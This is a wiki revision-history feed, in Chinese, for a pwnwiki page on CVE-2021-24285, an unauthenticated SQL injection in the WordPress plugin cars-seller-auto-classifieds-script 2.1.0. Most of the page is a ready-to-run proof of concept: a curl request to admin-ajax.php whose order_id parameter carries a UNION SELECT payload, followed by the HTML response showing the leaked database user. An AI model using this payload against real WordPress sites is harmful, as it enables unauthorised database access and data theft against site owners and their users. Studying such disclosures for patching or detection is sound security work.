https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE%E2%80%8B%E2%80%8B-2021-24285_WordPress_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E CVE​​-2021-24285 WordPress SQL注入漏洞 - Revision history 2026-04-10T00:06:55Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE%E2%80%8B%E2%80%8B-2021-24285_WordPress_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1910&oldid=prev Pwnwiki: Created page with "==簡介== 插件名稱:wp-plugin:cars-seller-auto-classifieds-script 受影響的版本:2.1.0(如果有,則可能是較低版本) 漏洞:注入 所需的最..." 2021-04-28T03:15:48Z <p>Created page with &quot;==簡介== 插件名稱:wp-plugin:cars-seller-auto-classifieds-script 受影響的版本:2.1.0(如果有,則可能是較低版本) 漏洞:注入 所需的最...&quot;</p> <p><b>New page</b></p><div>==簡介==<br /> 插件名稱:wp-plugin:cars-seller-auto-classifieds-script<br /> <br /> 受影響的版本:2.1.0(如果有,則可能是較低版本)<br /> <br /> 漏洞:注入<br /> <br /> 所需的最低訪問級別:未認證<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> curl 'http://&lt;Hostname&gt;/wp-admin/admin-ajax.php' \<br /> --data-raw 'action=request_list_request&amp;order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \<br /> --compressed \<br /> --insecure<br /> &lt;/pre&gt;<br /> <br /> &lt;pre&gt;<br /> <br /> &lt;h1&gt;Request Details&lt;/h1&gt;<br /> &lt;table style=&quot; border: 1px solid #999;width:96%&quot; class=&quot;order_detail&quot;&gt;<br /> &lt;tr&gt;<br /> &lt;td&gt;Request Id&lt;/td&gt;&lt;td&gt;&lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;tr&gt;<br /> &lt;td&gt;Car Title&lt;/td&gt;&lt;td&gt;Untitled&lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;tr&gt;<br /> &lt;td&gt;Name&lt;/td&gt;&lt;td&gt;bob@localhost bob@localhost&lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;tr&gt;<br /> &lt;td&gt;Email&lt;/td&gt;&lt;td&gt;bob@localhost&lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;tr&gt;<br /> &lt;td&gt;Phone&lt;/td&gt;&lt;td&gt;bob@localhost&lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;tr&gt;<br /> &lt;td&gt;Message&lt;/td&gt;&lt;td&gt;bob@localhost&lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;tr&gt;<br /> &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;&lt;a href=&quot;mailto:bob@localhost&quot; style=&quot;background: #2ea2cc;border-color: #0074a2;-webkit-box-shadow: inset 0 1px 0 rgba(120,200,230,.5),0 1px 0 rgba(0,0,0,.15);box-shadow: inset 0 1px 0 rgba(120,200,230,.5),0 1px 0 rgba(0,0,0,.15);color: #fff;text-decoration: none;vertical-align: baseline;display: inline-block;text-decoration: none;font-size: 13px;line-height: 26px;height: 28px;margin: 0;padding: 0 10px 1px;cursor: pointer;border-width: 1px;<br /> border-style: solid;-webkit-appearance: none;-webkit-border-radius: 3px;border-radius: 3px;white-space: nowrap;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;&quot;&gt;Reply&lt;/a&gt;&lt;/td&gt;<br /> <br /> &lt;/tr&gt;<br /> <br /> &lt;/table&gt;<br /> &lt;p style=&quot;margin-top:20px; text-align:right;&quot;&gt;&lt;a href=&quot;#&quot; id=&quot;close&quot;&gt;Close&lt;/a&gt;&lt;/p&gt;<br /> &lt;/pre&gt;</div> Pwnwiki